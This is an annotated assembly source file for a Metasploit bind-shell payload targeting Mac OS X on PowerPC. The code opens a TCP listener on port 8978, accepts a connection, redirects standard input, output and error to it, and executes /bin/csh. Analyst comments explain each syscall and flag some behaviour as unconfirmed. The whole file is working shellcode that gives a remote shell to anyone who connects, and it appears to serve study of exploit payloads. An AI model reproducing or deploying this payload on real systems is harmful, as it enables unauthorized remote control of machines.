;;
;
; Name: single_bind_tcp
; Qualities: Can Have Nulls
; Platforms: MacOS X / PPC
; Authors: H D Moore <hdm [at] metasploit.com>
; Version: $Revision: 1612 $
; License:
;
; This file is part of the Metasploit Exploit Framework
; and is subject to the same licenses and copyrights as
; the rest of this package.
;
; Description:
;
; Quick and dirty bind shell
;
;
;;

; Analyst notes (Darwin/PPC, GNU as syntax, ';' comments):
;   r1  = stack pointer. Scratch words are stored below r1 without moving
;         it (presumably relying on the Darwin PPC red zone - confirm).
;   r30 = listening socket fd, later overwritten with the accepted fd.
;   r0  = syscall number for each `sc`. The `xor r0, r0, r0` after each
;         `sc` is a no-op filler. NOTE(review): this looks like the Darwin
;         PPC convention where a successful syscall returns to sc+8 and a
;         failed one to sc+4, so both paths land on the same next
;         instruction - confirm against the kernel trap return path.
;   No syscall return value is ever checked.
;   _execsh is exported on its own (presumably so the execve tail can be
;   reused independently - not verifiable from this file).

.globl _main
.globl _execsh
.text

_main:

_socket:
li r3, 2                    ; domain   = 2 (AF_INET)
li r4, 1                    ; type     = 1 (SOCK_STREAM)
li r5, 6                    ; protocol = 6 (IPPROTO_TCP)
li r0, 97                   ; syscall 97 = socket
sc
xor r0, r0, r0              ; filler (see notes above)
mr r30, r3                  ; r30 = listening socket fd

bl _bind                    ; lr = address of the sockaddr data below, then jump to _bind
.long 0x00022312            ; sockaddr_in: sin_len=0, sin_family=2 (AF_INET), sin_port=0x2312 (8978)
.long 0x00000000            ; sin_addr = 0.0.0.0 (INADDR_ANY)
                            ; the remaining 8 bytes of the 16-byte struct (sin_zero)
                            ; overlap the first two instructions of _bind

_bind:
mflr r4                     ; r4 = &sockaddr (set by the bl above)
li r5, 16                   ; addrlen = 16 = sizeof(struct sockaddr_in)
li r0, 104                  ; syscall 104 = bind
mr r3, r30                  ; r3 = listening socket fd
sc
xor r0, r0, r0              ; filler

_listen:
li r0, 106                  ; syscall 106 = listen
mr r3, r30                  ; r3 = listening socket fd
sc                          ; backlog (r4) is not set explicitly; it is whatever r4 holds after bind
xor r0, r0, r0              ; filler

_accept:
mr r3, r30                  ; r3 = listening socket fd
li r0, 30                   ; syscall 30 = accept
li r4, 16
stw r4, -24(r1)             ; *(r1-24) = 16 -> addrlen in/out word
subi r5, r1, 24             ; r5 = &addrlen
subi r4, r1, 16             ; r4 = 16-byte peer sockaddr buffer at r1-16
sc
xor r0, r0, r0              ; filler
mr r30, r3                  ; r30 = accepted connection fd (listening fd is not kept)

_setup_dup2:
li r5, 2                    ; start at fd 2 (stderr), count down to 0

_dup2:
li r0, 90                   ; syscall 90 = dup2
mr r3, r30                  ; r3 = accepted fd
mr r4, r5                   ; r4 = target fd (2, 1, 0)
sc
xor r0, r0, r0              ; filler
subi r5, r5, 1
cmpwi r5, -1
bnel _dup2                  ; loop until r5 == -1; the link form also writes lr, harmless here

_fork:
li r0, 2                    ; syscall 2 = fork
sc                          ; return value is not checked: parent and child both fall through
xor r5, r5, r5              ; r5 = 0 (also serves as the filler slot for the sc above)

_execsh:
;; based on ghandi's execve
xor. r5, r5, r5             ; r5 = 0 and CR0 = EQ, so the next branch is never taken
bnel _execsh                ; not taken, but LK=1 still sets lr = address of the following mflr
mflr r3                     ; r3 = address of this mflr instruction
addi r3, r3, 28 ; distance to path (7 instructions * 4 bytes from the mflr to `path`)
stw r3, -8(r1) ; argv[0] = path
stw r5, -4(r1) ; argv[1] = NULL
subi r4, r1, 8 ; r4 = {path, 0}
li r0, 59                   ; syscall 59 = execve
sc ; execve(path, argv, NULL) - r5 = 0 is envp; no filler follows, so on failure execution runs into the data below

; csh removes the need for setuid()
path:
.ascii "/bin/csh"
.long 0x00414243            ; big-endian bytes 00 41 42 43: the leading 00 terminates the string, "ABC" is padding
